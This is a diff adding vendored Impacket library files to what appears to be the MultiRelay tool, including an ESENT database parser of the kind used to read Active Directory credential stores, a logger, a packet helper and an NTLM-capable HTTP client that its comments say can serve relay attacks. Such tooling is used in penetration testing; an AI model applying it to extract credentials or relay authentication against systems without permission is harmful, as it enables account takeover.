+                hexdump((self.data[baseOffset+valueOffset:][:6]))
+                pageFlags = ord(self.data[baseOffset+valueOffset:][1]) >> 5
+                #print "TAG FLAG: 0x%x " % (unpack('<L', self.data[baseOffset+valueOffset:][:4]) ) >> 5
+                #print "TAG FLAG: 0x " , ord(self.data[baseOffset+valueOffset:][0])
+            else:
+                valueSize = unpack('<H', tag[:2])[0] & 0x1fff
+                pageFlags = (unpack('<H', tag[2:])[0] & 0xe000) >> 13
+                valueOffset = unpack('<H',tag[2:])[0] & 0x1fff
+                
+            print("TAG %-8d offset:0x%-6x flags:0x%-4x valueSize:0x%x" % (i,valueOffset,pageFlags,valueSize))
+            #hexdump(self.getTag(i)[1])
+            tags = tags[:-4]
+
+        if self.record['PageFlags'] & FLAGS_ROOT > 0:
+            rootHeader = ESENT_ROOT_HEADER(self.getTag(0)[1])
+            rootHeader.dump()
+        elif self.record['PageFlags'] & FLAGS_LEAF == 0:
+            # Branch Header
+            flags, data = self.getTag(0)
+            branchHeader = ESENT_BRANCH_HEADER(data)
+            branchHeader.dump()
+        else:
+            # Leaf Header
+            flags, data = self.getTag(0)
+            if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                # Space Tree
+                spaceTreeHeader = ESENT_SPACE_TREE_HEADER(data)
+                spaceTreeHeader.dump()
+            else:
+                leafHeader = ESENT_LEAF_HEADER(data)
+                leafHeader.dump()
+
+        # Print the leaf/branch tags
+        for tagNum in range(1,self.record['FirstAvailablePageTag']):
+            flags, data = self.getTag(tagNum)
+            if self.record['PageFlags'] & FLAGS_LEAF == 0:
+                # Branch page
+                branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                branchEntry.dump()
+            elif self.record['PageFlags'] & FLAGS_LEAF > 0:
+                # Leaf page
+                if self.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                    # Space Tree
+                    spaceTreeEntry = ESENT_SPACE_TREE_ENTRY(data)
+                    #spaceTreeEntry.dump()
+
+                elif self.record['PageFlags'] & FLAGS_INDEX > 0:
+                    # Index Entry
+                    indexEntry = ESENT_INDEX_ENTRY(data)
+                    #indexEntry.dump()
+                elif self.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                    # Long Page Value
+                    raise Exception('Long value still not supported')
+                else:
+                    # Table Value
+                    leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                    dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(leafEntry['EntryData'])
+                    dataDefinitionHeader.dump()
+                    catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(leafEntry['EntryData'][len(dataDefinitionHeader):])
+                    catalogEntry.dump()
+                    hexdump(leafEntry['EntryData'])
+
+    def getTag(self, tagNum):
+        if self.record['FirstAvailablePageTag'] < tagNum:
+            raise Exception('Trying to grab an unknown tag 0x%x' % tagNum)
+
+        tags = self.data[-4*self.record['FirstAvailablePageTag']:]
+        baseOffset = len(self.record)
+        for i in range(tagNum):
+            tags = tags[:-4]
+
+        tag = tags[-4:]
+
+        if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] >= 17 and self.__DBHeader['PageSize'] > 8192:
+            valueSize = unpack('<H', tag[:2])[0] & 0x7fff
+            valueOffset = unpack('<H',tag[2:])[0] & 0x7fff
+            tmpData = list(self.data[baseOffset+valueOffset:][:valueSize])
+            pageFlags = ord(tmpData[1]) >> 5
+            tmpData[1] = chr(ord(tmpData[1:2]) & 0x1f)
+            tagData = "".join(tmpData)
+        else:
+            valueSize = unpack('<H', tag[:2])[0] & 0x1fff
+            pageFlags = (unpack('<H', tag[2:])[0] & 0xe000) >> 13
+            valueOffset = unpack('<H',tag[2:])[0] & 0x1fff
+            tagData = self.data[baseOffset+valueOffset:][:valueSize]
+
+        #return pageFlags, self.data[baseOffset+valueOffset:][:valueSize]
+        return pageFlags, tagData
+
+class ESENT_DB:
+    def __init__(self, fileName, pageSize = 8192, isRemote = False):
+        self.__fileName = fileName
+        self.__pageSize = pageSize
+        self.__DB = None
+        self.__DBHeader = None
+        self.__totalPages = None
+        self.__tables = OrderedDict()
+        self.__currentTable = None
+        self.__isRemote = isRemote
+        self.mountDB()
+
+    def mountDB(self):
+        LOG.debug("Mounting DB...")
+        if self.__isRemote is True:
+            self.__DB = self.__fileName
+            self.__DB.open()
+        else:
+            self.__DB = open(self.__fileName,"rb")
+        mainHeader = self.getPage(-1)
+        self.__DBHeader = ESENT_DB_HEADER(mainHeader)
+        self.__pageSize = self.__DBHeader['PageSize']
+        self.__DB.seek(0,2)
+        self.__totalPages = (self.__DB.tell() // self.__pageSize) -2
+        LOG.debug("Database Version:0x%x, Revision:0x%x"% (self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision']))
+        LOG.debug("Page Size: %d" % self.__pageSize)
+        LOG.debug("Total Pages in file: %d" % self.__totalPages)
+        self.parseCatalog(CATALOG_PAGE_NUMBER)
+
+    def printCatalog(self):
+        indent = '    '
+
+        print("Database version: 0x%x, 0x%x" % (self.__DBHeader['Version'], self.__DBHeader['FileFormatRevision'] ))
+        print("Page size: %d " % self.__pageSize)
+        print("Number of pages: %d" % self.__totalPages)
+        print() 
+        print("Catalog for %s" % self.__fileName)
+        for table in list(self.__tables.keys()):
+            print("[%s]" % table.decode('utf8'))
+            print("%sColumns " % indent)
+            for column in list(self.__tables[table]['Columns'].keys()):
+                record = self.__tables[table]['Columns'][column]['Record']
+                print("%s%-5d%-30s%s" % (indent*2, record['Identifier'], column.decode('utf-8'),ColumnTypeToName[record['ColumnType']]))
+            print("%sIndexes"% indent)
+            for index in list(self.__tables[table]['Indexes'].keys()):
+                print("%s%s" % (indent*2, index.decode('utf-8')))
+            print("")
+
+    def __addItem(self, entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+        catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(entry['EntryData'][len(dataDefinitionHeader):])
+        itemName = self.__parseItemName(entry)
+
+        if catalogEntry['Type'] == CATALOG_TYPE_TABLE:
+            self.__tables[itemName] = OrderedDict()
+            self.__tables[itemName]['TableEntry'] = entry
+            self.__tables[itemName]['Columns']    = OrderedDict()
+            self.__tables[itemName]['Indexes']    = OrderedDict()
+            self.__tables[itemName]['LongValues'] = OrderedDict()
+            self.__currentTable = itemName
+        elif catalogEntry['Type'] == CATALOG_TYPE_COLUMN:
+            self.__tables[self.__currentTable]['Columns'][itemName] = entry
+            self.__tables[self.__currentTable]['Columns'][itemName]['Header'] = dataDefinitionHeader
+            self.__tables[self.__currentTable]['Columns'][itemName]['Record'] = catalogEntry
+        elif catalogEntry['Type'] == CATALOG_TYPE_INDEX:
+            self.__tables[self.__currentTable]['Indexes'][itemName] = entry
+        elif catalogEntry['Type'] == CATALOG_TYPE_LONG_VALUE:
+            self.__addLongValue(entry)
+        else:
+            raise Exception('Unknown type 0x%x' % catalogEntry['Type'])
+
+    def __parseItemName(self,entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+
+        if dataDefinitionHeader['LastVariableDataType'] > 127:
+            numEntries =  dataDefinitionHeader['LastVariableDataType'] - 127
+        else:
+            numEntries =  dataDefinitionHeader['LastVariableDataType']
+
+        itemLen = unpack('<H',entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][:2])[0]
+        itemName = entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][2*numEntries:][:itemLen]
+        return itemName
+
+    def __addLongValue(self, entry):
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+        lvLen = unpack('<H',entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][:2])[0]
+        lvName = entry['EntryData'][dataDefinitionHeader['VariableSizeOffset']:][7:][:lvLen]
+        self.__tables[self.__currentTable]['LongValues'][lvName] = entry
+
+    def parsePage(self, page):
+        # Print the leaf/branch tags
+        for tagNum in range(1,page.record['FirstAvailablePageTag']):
+            flags, data = page.getTag(tagNum)
+            if page.record['PageFlags'] & FLAGS_LEAF > 0:
+                # Leaf page
+                if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                    pass
+                elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+                    pass
+                elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                    pass
+                else:
+                    # Table Value
+                    leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                    self.__addItem(leafEntry)
+
+    def parseCatalog(self, pageNum):
+        # Parse all the pages starting at pageNum and commit table data
+        page = self.getPage(pageNum)
+        self.parsePage(page)
+
+        for i in range(1, page.record['FirstAvailablePageTag']):
+            flags, data = page.getTag(i)
+            if page.record['PageFlags'] & FLAGS_LEAF == 0:
+                # Branch page
+                branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                self.parseCatalog(branchEntry['ChildPageNumber'])
+
+
+    def readHeader(self):
+        LOG.debug("Reading Boot Sector for %s" % self.__volumeName)
+
+    def getPage(self, pageNum):
+        LOG.debug("Trying to fetch page %d (0x%x)" % (pageNum, (pageNum+1)*self.__pageSize))
+        self.__DB.seek((pageNum+1)*self.__pageSize, 0)
+        data = self.__DB.read(self.__pageSize)
+        while len(data) < self.__pageSize:
+            remaining = self.__pageSize - len(data)
+            data += self.__DB.read(remaining)
+        # Special case for the first page
+        if pageNum <= 0:
+            return data
+        else:
+            return ESENT_PAGE(self.__DBHeader, data)
+
+    def close(self):
+        self.__DB.close()
+
+    def openTable(self, tableName):
+        # Returns a cursos for later use
+
+        if isinstance(tableName, bytes) is not True:
+            tableName = b(tableName)
+
+        if tableName in self.__tables:
+            entry = self.__tables[tableName]['TableEntry']
+            dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(entry['EntryData'])
+            catalogEntry = ESENT_CATALOG_DATA_DEFINITION_ENTRY(entry['EntryData'][len(dataDefinitionHeader):])
+            
+            # Let's position the cursor at the leaf levels for fast reading
+            pageNum = catalogEntry['FatherDataPageNumber']
+            done = False
+            while done is False:
+                page = self.getPage(pageNum)
+                if page.record['FirstAvailablePageTag'] <= 1:
+                    # There are no records
+                    done = True
+                for i in range(1, page.record['FirstAvailablePageTag']):
+                    flags, data = page.getTag(i)
+                    if page.record['PageFlags'] & FLAGS_LEAF == 0:
+                        # Branch page, move on to the next page
+                        branchEntry = ESENT_BRANCH_ENTRY(flags, data)
+                        pageNum = branchEntry['ChildPageNumber']
+                        break
+                    else:
+                        done = True
+                        break
+                
+            cursor = TABLE_CURSOR
+            cursor['TableData'] = self.__tables[tableName]
+            cursor['FatherDataPageNumber'] = catalogEntry['FatherDataPageNumber']
+            cursor['CurrentPageData'] = page
+            cursor['CurrentTag']  = 0
+            return cursor
+        else:
+            return None
+
+    def __getNextTag(self, cursor):
+        page = cursor['CurrentPageData']
+
+        if cursor['CurrentTag'] >= page.record['FirstAvailablePageTag']:
+            # No more data in this page, chau
+            return None
+
+        flags, data = page.getTag(cursor['CurrentTag'])
+        if page.record['PageFlags'] & FLAGS_LEAF > 0:
+            # Leaf page
+            if page.record['PageFlags'] & FLAGS_SPACE_TREE > 0:
+                raise Exception('FLAGS_SPACE_TREE > 0')
+            elif page.record['PageFlags'] & FLAGS_INDEX > 0:
+                raise Exception('FLAGS_INDEX > 0')
+            elif page.record['PageFlags'] & FLAGS_LONG_VALUE > 0:
+                raise Exception('FLAGS_LONG_VALUE > 0')
+            else:
+                # Table Value
+                leafEntry = ESENT_LEAF_ENTRY(flags, data)
+                return leafEntry
+
+        return None
+
+    def getNextRow(self, cursor):
+        cursor['CurrentTag'] += 1
+
+        tag = self.__getNextTag(cursor)
+        #hexdump(tag)
+
+        if tag is None:
+            # No more tags in this page, search for the next one on the right
+            page = cursor['CurrentPageData']
+            if page.record['NextPageNumber'] == 0:
+                # No more pages, chau
+                return None
+            else:
+                cursor['CurrentPageData'] = self.getPage(page.record['NextPageNumber'])
+                cursor['CurrentTag'] = 0
+                return self.getNextRow(cursor)
+        else:
+            return self.__tagToRecord(cursor, tag['EntryData'])
+
+    def __tagToRecord(self, cursor, tag):
+        # So my brain doesn't forget, the data record is composed of:
+        # Header
+        # Fixed Size Data (ID < 127)
+        #     The easiest to parse. Their size is fixed in the record. You can get its size
+        #     from the Column Record, field SpaceUsage
+        # Variable Size Data (127 < ID < 255)
+        #     At VariableSizeOffset you get an array of two bytes per variable entry, pointing
+        #     to the length of the value. Values start at:
+        #                numEntries = LastVariableDataType - 127
+        #                VariableSizeOffset + numEntries * 2 (bytes)
+        # Tagged Data ( > 255 )
+        #     After the Variable Size Value, there's more data for the tagged values.
+        #     Right at the beginning there's another array (taggedItems), pointing to the
+        #     values, size.
+        #
+        # The interesting thing about this DB records is there's no need for all the columns to be there, hence
+        # saving space. That's why I got over all the columns, and if I find data (of any type), i assign it. If 
+        # not, the column's empty.
+        #
+        # There are a lot of caveats in the code, so take your time to explore it. 
+        #
+        # ToDo: Better complete this description
+        #
+
+        record = OrderedDict()
+        taggedItems = OrderedDict()
+        taggedItemsParsed = False
+
+        dataDefinitionHeader = ESENT_DATA_DEFINITION_HEADER(tag)
+        #dataDefinitionHeader.dump()
+        variableDataBytesProcessed = (dataDefinitionHeader['LastVariableDataType'] - 127) * 2
+        prevItemLen = 0
+        tagLen = len(tag)
+        fixedSizeOffset = len(dataDefinitionHeader)
+        variableSizeOffset = dataDefinitionHeader['VariableSizeOffset'] 
+ 
+        columns = cursor['TableData']['Columns'] 
+        
+        for column in list(columns.keys()):
+            columnRecord = columns[column]['Record']
+            #columnRecord.dump()
+            if columnRecord['Identifier'] <= dataDefinitionHeader['LastFixedSize']:
+                # Fixed Size column data type, still available data
+                record[column] = tag[fixedSizeOffset:][:columnRecord['SpaceUsage']]
+                fixedSizeOffset += columnRecord['SpaceUsage']
+
+            elif 127 < columnRecord['Identifier'] <= dataDefinitionHeader['LastVariableDataType']:
+                # Variable data type
+                index = columnRecord['Identifier'] - 127 - 1
+                itemLen = unpack('<H',tag[variableSizeOffset+index*2:][:2])[0]
+
+                if itemLen & 0x8000:
+                    # Empty item
+                    itemLen = prevItemLen
+                    record[column] = None
+                else:
+                    itemValue = tag[variableSizeOffset+variableDataBytesProcessed:][:itemLen-prevItemLen]
+                    record[column] = itemValue
+
+                #if columnRecord['Identifier'] <= dataDefinitionHeader['LastVariableDataType']:
+                variableDataBytesProcessed +=itemLen-prevItemLen
+
+                prevItemLen = itemLen
+
+            elif columnRecord['Identifier'] > 255:
+                # Have we parsed the tagged items already?
+                if taggedItemsParsed is False and (variableDataBytesProcessed+variableSizeOffset) < tagLen:
+                    index = variableDataBytesProcessed+variableSizeOffset
+                    #hexdump(tag[index:])
+                    endOfVS = self.__pageSize
+                    firstOffsetTag = (unpack('<H', tag[index+2:][:2])[0] & 0x3fff) + variableDataBytesProcessed+variableSizeOffset
+                    while True:
+                        taggedIdentifier = unpack('<H', tag[index:][:2])[0]
+                        index += 2
+                        taggedOffset = (unpack('<H', tag[index:][:2])[0] & 0x3fff) 
+                        # As of Windows 7 and later ( version 0x620 revision 0x11) the 
+                        # tagged data type flags are always present
+                        if self.__DBHeader['Version'] == 0x620 and self.__DBHeader['FileFormatRevision'] >= 17 and self.__DBHeader['PageSize'] > 8192: 
+                            flagsPresent = 1
+                        else:
+                            flagsPresent = (unpack('<H', tag[index:][:2])[0] & 0x4000)
+                        index += 2
+                        if taggedOffset < endOfVS:
+                            endOfVS = taggedOffset
+                        taggedItems[taggedIdentifier] = (taggedOffset, tagLen, flagsPresent)
+                        #print "ID: %d, Offset:%d, firstOffset:%d, index:%d, flag: 0x%x" % (taggedIdentifier, taggedOffset,firstOffsetTag,index, flagsPresent)
+                        if index >= firstOffsetTag:
+                            # We reached the end of the variable size array
+                            break
+                
+                    # Calculate length of variable items
+                    # Ugly.. should be redone
+                    prevKey = list(taggedItems.keys())[0]
+                    for i in range(1,len(taggedItems)):
+                        offset0, length, flags = taggedItems[prevKey]
+                        offset, _, _ = list(taggedItems.items())[i][1]
+                        taggedItems[prevKey] = (offset0, offset-offset0, flags)
+                        #print "ID: %d, Offset: %d, Len: %d, flags: %d" % (prevKey, offset0, offset-offset0, flags)
+                        prevKey = list(taggedItems.keys())[i]
+                    taggedItemsParsed = True
+ 
+                # Tagged data type
+                if columnRecord['Identifier'] in taggedItems:
+                    offsetItem = variableDataBytesProcessed + variableSizeOffset + taggedItems[columnRecord['Identifier']][0] 
+                    itemSize = taggedItems[columnRecord['Identifier']][1]
+                    # If item have flags, we should skip them
+                    if taggedItems[columnRecord['Identifier']][2] > 0:
+                        itemFlag = ord(tag[offsetItem:offsetItem+1])
+                        offsetItem += 1
+                        itemSize -= 1
+                    else:
+                        itemFlag = 0
+
+                    #print "ID: %d, itemFlag: 0x%x" %( columnRecord['Identifier'], itemFlag)
+                    if itemFlag & (TAGGED_DATA_TYPE_COMPRESSED ):
+                        LOG.error('Unsupported tag column: %s, flag:0x%x' % (column, itemFlag))
+                        record[column] = None
+                    elif itemFlag & TAGGED_DATA_TYPE_MULTI_VALUE:
+                        # ToDo: Parse multi-values properly
+                        LOG.debug('Multivalue detected in column %s, returning raw results' % (column))
+                        record[column] = (hexlify(tag[offsetItem:][:itemSize]),)
+                    else:
+                        record[column] = tag[offsetItem:][:itemSize]
+
+                else:
+                    record[column] = None
+            else:
+                record[column] = None
+
+            # If we understand the data type, we unpack it and cast it accordingly
+            # otherwise, we just encode it in hex
+            if type(record[column]) is tuple:
+                # A multi value data, we won't decode it, just leave it this way
+                record[column] = record[column][0]
+            elif columnRecord['ColumnType'] == JET_coltypText or columnRecord['ColumnType'] == JET_coltypLongText: 
+                # Let's handle strings
+                if record[column] is not None:
+                    if columnRecord['CodePage'] not in StringCodePages:
+                        raise Exception('Unknown codepage 0x%x'% columnRecord['CodePage'])
+                    stringDecoder = StringCodePages[columnRecord['CodePage']]
+
+                    try:
+                        record[column] = record[column].decode(stringDecoder)
+                    except Exception:
+                        LOG.debug("Exception:", exc_info=True)
+                        LOG.debug('Fixing Record[%r][%d]: %r' % (column, columnRecord['ColumnType'], record[column]))
+                        record[column] = record[column].decode(stringDecoder, "replace")
+                        pass
+            else:
+                unpackData = ColumnTypeSize[columnRecord['ColumnType']]
+                if record[column] is not None:
+                    if unpackData is None:
+                        record[column] = hexlify(record[column])
+                    else:
+                        unpackStr = unpackData[1]
+                        record[column] = unpack(unpackStr, record[column])[0]
+
+        return record
--- a/tools/MultiRelay/impacket-dev/impacket/examples/init.py
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/init.py
@@ -0,0 +1 @@
+pass
--- a/tools/MultiRelay/impacket-dev/impacket/examples/logger.py
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/logger.py
@@ -0,0 +1,59 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description: This logger is intended to be used by impacket instead
+# of printing directly. This will allow other libraries to use their
+# custom logging implementation.
+#
+
+import logging
+import sys
+
+# This module can be used by scripts using the Impacket library 
+# in order to configure the root logger to output events 
+# generated by the library with a predefined format
+
+# If the scripts want to generate log entries, they can write
+# directly to the root logger (logging.info, debug, etc).
+
+class ImpacketFormatter(logging.Formatter):
+  '''
+  Prefixing logged messages through the custom attribute 'bullet'.
+  '''
+  def __init__(self):
+      logging.Formatter.__init__(self,'%(bullet)s %(message)s', None)
+
+  def format(self, record):
+    if record.levelno == logging.INFO:
+      record.bullet = '[*]'
+    elif record.levelno == logging.DEBUG:
+      record.bullet = '[+]'
+    elif record.levelno == logging.WARNING:
+      record.bullet = '[!]'
+    else:
+      record.bullet = '[-]'
+
+    return logging.Formatter.format(self, record)
+
+class ImpacketFormatterTimeStamp(ImpacketFormatter):
+  '''
+  Prefixing logged messages through the custom attribute 'bullet'.
+  '''
+  def __init__(self):
+      logging.Formatter.__init__(self,'[%(asctime)-15s] %(bullet)s %(message)s', None)
+
+  def formatTime(self, record, datefmt=None):
+      return ImpacketFormatter.formatTime(self, record, datefmt="%Y-%m-%d %H:%M:%S")
+
+def init(ts=False):
+    # We add a StreamHandler and formatter to the root logger
+    handler = logging.StreamHandler(sys.stdout)
+    if not ts:
+        handler.setFormatter(ImpacketFormatter())
+    else:
+        handler.setFormatter(ImpacketFormatterTimeStamp())
+    logging.getLogger().addHandler(handler)
+    logging.getLogger().setLevel(logging.INFO)
--- a/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
+++ b/tools/MultiRelay/impacket-dev/impacket/examples/secretsdump.py
--- a/tools/MultiRelay/impacket-dev/impacket/helper.py
+++ b/tools/MultiRelay/impacket-dev/impacket/helper.py
@@ -0,0 +1,150 @@
+# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#  Helper used to build ProtocolPackets
+#
+# Author:
+# Aureliano Calvo
+
+
+import struct
+import functools
+from six import add_metaclass
+
+import impacket.ImpactPacket as ip
+
+
+def rebind(f):
+    functools.wraps(f)
+    def rebinder(*args, **kwargs):
+        return f(*args, **kwargs)
+        
+    return rebinder
+
+class Field(object):
+    def __init__(self, index):
+        self.index = index
+    
+    def __call__(self, k, d):
+        getter = rebind(self.getter)
+        getter_name = "get_" + k
+        getter.__name__ = getter_name
+        getter.__doc__ = "Get the %s field" % k
+        d[getter_name] = getter
+        
+        setter = rebind(self.setter)
+        setter_name = "set_" + k
+        setter.__name__ = setter_name
+        setter.__doc__ = "Set the %s field" % k
+        d["set_" + k] = setter
+        
+        d[k] = property(getter, setter, doc="%s property" % k)
+        
+class Bit(Field):
+    def __init__(self, index, bit_number):
+        Field.__init__(self, index)
+        self.mask = 2 ** bit_number
+        self.off_mask = (~self.mask) & 0xff
+        
+    def getter(self, o):
+        return (o.header.get_byte(self.index) & self.mask) != 0
+    
+    def setter(self, o, value=True):
+        b = o.header.get_byte(self.index)
+        if value:
+            b |= self.mask
+        else:
+            b &= self.off_mask
+        
+        o.header.set_byte(self.index, b) 
+
+class Byte(Field):
+    
+    def __init__(self, index):
+        Field.__init__(self, index)
+        
+    def getter(self, o):
+        return o.header.get_byte(self.index)
+    
+    def setter(self, o, value):
+        o.header.set_byte(self.index, value)
+        
+class Word(Field):
+    def __init__(self, index, order="!"):
+        Field.__init__(self, index)
+        self.order = order
+        
+    def getter(self, o):
+        return o.header.get_word(self.index, self.order)
+    
+    def setter(self, o, value):
+        o.header.set_word(self.index, value, self.order)
+
+class Long(Field):        
+    def __init__(self, index, order="!"):
+        Field.__init__(self, index)        
+        self.order = order
+        
+    def getter(self, o):
+        return o.header.get_long(self.index, self.order)
+    
+    def setter(self, o, value):
+        o.header.set_long(self.index, value, self.order)
+        
+class ThreeBytesBigEndian(Field):
+    def __init__(self, index):
+        Field.__init__(self, index)
+                
+    def getter(self, o):
+        b=o.header.get_bytes()[self.index:self.index+3].tostring()
+        #unpack requires a string argument of length 4 and b is 3 bytes long
+        (value,)=struct.unpack('!L', b'\x00'+b)
+        return value
+
+    def setter(self, o, value):
+        # clear the bits
+        mask = ((~0xFFFFFF00) & 0xFF)
+        masked = o.header.get_long(self.index, ">") & mask
+        # set the bits 
+        nb = masked | ((value & 0x00FFFFFF) << 8)
+        o.header.set_long(self.index, nb, ">")
+
+
+class ProtocolPacketMetaklass(type):
+    def __new__(cls, name, bases, d):
+        d["_fields"] = []
+        items = list(d.items())
+        if not object in bases:
+            bases += (object,)
+        for k,v in items:
+            if isinstance(v, Field):
+                d["_fields"].append(k) 
+                v(k, d)
+                
+        d["_fields"].sort()
+        
+        def _fields_repr(self):
+            return " ".join( "%s:%s" % (f, repr(getattr(self, f))) for f in self._fields )
+        def __repr__(self):
+            
+            return "<%(name)s %(fields)s \nchild:%(r_child)s>" % {
+                "name": name,
+                "fields": self._fields_repr(),
+                "r_child": repr(self.child()), 
+            }
+        
+        d["_fields_repr"] = _fields_repr
+        d["__repr__"] = __repr__
+        
+        return type.__new__(cls, name, bases, d)
+
+@add_metaclass(ProtocolPacketMetaklass)
+class ProtocolPacket(ip.ProtocolPacket):
+    def __init__(self, buff = None):
+        ip.ProtocolPacket.__init__(self, self.header_size, self.tail_size)
+        if buff:
+            self.load_packet(buff)
--- a/tools/MultiRelay/impacket-dev/impacket/hresult_errors.py
+++ b/tools/MultiRelay/impacket-dev/impacket/hresult_errors.py
--- a/tools/MultiRelay/impacket-dev/impacket/http.py
+++ b/tools/MultiRelay/impacket-dev/impacket/http.py
@@ -0,0 +1,206 @@
+# SECUREAUTH LABS. Copyright 2020 SecureAuth Corporation. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Authors:
+#  Arseniy Sharoglazov <mohemiv@gmail.com> / Positive Technologies (https://www.ptsecurity.com/)
+#
+# Description:
+#  For MS-RPCH
+#  Can be programmed to be used in relay attacks
+#
+# Probably for future MAPI
+
+import re
+import ssl
+import base64
+import binascii
+
+try:
+    from http.client import HTTPConnection, HTTPSConnection
+except ImportError:
+    from httplib import HTTPConnection, HTTPSConnection
+
+from impacket import ntlm, LOG
+
+# Auth types
+AUTH_AUTO      = 'Auto'
+AUTH_BASIC     = 'Basic'
+AUTH_NTLM      = 'NTLM'
+AUTH_NEGOTIATE = 'Negotiate'
+AUTH_BEARER    = 'Bearer'
+AUTH_DIGEST    = 'Digest'
+
+################################################################################
+# CLASSES
+################################################################################
+class HTTPClientSecurityProvider:
+    def __init__(self, auth_type=AUTH_AUTO):
+        self.__username = None
+        self.__password = None
+        self.__domain   = None
+        self.__lmhash   = ''
+        self.__nthash   = ''
+        self.__aesKey   = ''
+        self.__TGT      = None
+        self.__TGS      = None
+
+        self.__auth_type = auth_type
+
+        self.__auth_types = []
+        self.__ntlmssp_info = None
+
+    def set_auth_type(self, auth_type):
+        self.__auth_type = auth_type
+
+    def get_auth_type(self):
+        return self.__auth_type
+
+    def get_auth_types(self):
+        return self.__auth_types
+
+    def get_ntlmssp_info(self):
+        return self.__ntlmssp_info
+
+    def set_credentials(self, username, password, domain='', lmhash='', nthash='', aesKey='', TGT=None, TGS=None):
+        self.__username = username
+        self.__password = password
+        self.__domain   = domain
+
+        if lmhash != '' or nthash != '':
+            if len(lmhash) % 2:
+                lmhash = '0%s' % lmhash
+            if len(nthash) % 2:
+                nthash = '0%s' % nthash
+
+            try: # just in case they were converted already
+                self.__lmhash = binascii.unhexlify(lmhash)
+                self.__nthash = binascii.unhexlify(nthash)
+            except:
+                self.__lmhash = lmhash
+                self.__nthash = nthash
+                pass
+
+        self.__aesKey = aesKey
+        self.__TGT    = TGT
+        self.__TGS    = TGS
+
+    def parse_www_authenticate(self, header):
+        ret = []
+
+        if 'NTLM' in header:
+            ret.append(AUTH_NTLM)
+        if 'Basic' in header:
+            ret.append(AUTH_BASIC)
+        if 'Negotiate' in header:
+            ret.append(AUTH_NEGOTIATE)
+        if 'Bearer' in header:
+            ret.append(AUTH_BEARER)
+        if 'Digest' in header:
+            ret.append(AUTH_DIGEST)
+
+        return ret
+
+    def connect(self, protocol, host_L6):
+        if protocol == 'http':
+            return HTTPConnection(host_L6)
+        else:
+            try:
+                uv_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
+                return HTTPSConnection(host_L6, context=uv_context)
+            except AttributeError:
+                return HTTPSConnection(host_L6)
+
+    def get_auth_headers(self, http_obj, method, path, headers):
+        if self.__auth_type == AUTH_BASIC:
+            return self.get_auth_headers_basic(http_obj, method, path, headers)
+        elif self.__auth_type in [AUTH_AUTO, AUTH_NTLM]:
+            return self.get_auth_headers_auto(http_obj, method, path, headers)
+        else:
+            raise Exception('%s auth type not supported' % self.__auth_type)
+
+    def get_auth_headers_basic(self, http_obj, method, path, headers):
+        if self.__lmhash != '' or self.__nthash != '' or \
+           self.__aesKey != '' or self.__TGT != None or self.__TGS != None:
+            raise Exception('Basic authentication in HTTP connection used, '
+                            'so set a plaintext credentials to connect.')
+
+        if self.__domain == '':
+            auth_line = self.__username + ':' + self.__password
+        else:
+            auth_line = self.__domain + '\\' + self.__username + ':' + self.__password
+
+        auth_line_http = 'Basic %s' % base64.b64encode(auth_line.encode('UTF-8')).decode('ascii')
+
+        # Format: auth_headers, reserved, ...
+        return {'Authorization': auth_line_http}, None
+
+    # It's important that the class contains the separate method that
+    # gets NTLM Type 1 value, as this way the class can be programmed to
+    # be used in relay attacks
+    def send_ntlm_type1(self, http_obj, method, path, headers, negotiateMessage):
+        auth_headers = headers.copy()
+        auth_headers['Content-Length'] = '0'
+        auth_headers['Authorization']  = 'NTLM %s' % base64.b64encode(negotiateMessage).decode('ascii')
+        http_obj.request(method, path, headers=auth_headers)
+        res = http_obj.getresponse()
+        res.read()
+
+        if res.status != 401:
+            raise Exception('Status code returned: %d. '
+                            'Authentication does not seem required for url %s'
+                            % (res.status, path)
+                )
+
+        if res.getheader('WWW-Authenticate') is None:
+           raise Exception('No authentication requested by '
+                           'the server for url %s' % path)
+
+        if self.__auth_types == []:
+            self.__auth_types = self.parse_www_authenticate(res.getheader('WWW-Authenticate'))
+
+        if AUTH_NTLM not in self.__auth_types:
+            # NTLM auth not supported for url
+            return None, None
+
+        try:
+            serverChallengeBase64 = re.search('NTLM ([a-zA-Z0-9+/]+={0,2})',
+                                              res.getheader('WWW-Authenticate')).group(1)
+            serverChallenge = base64.b64decode(serverChallengeBase64)
+        except (IndexError, KeyError, AttributeError):
+            raise Exception('No NTLM challenge returned from server for url %s' % path)
+
+        if not self.__ntlmssp_info:
+            challenge = ntlm.NTLMAuthChallenge(serverChallenge)
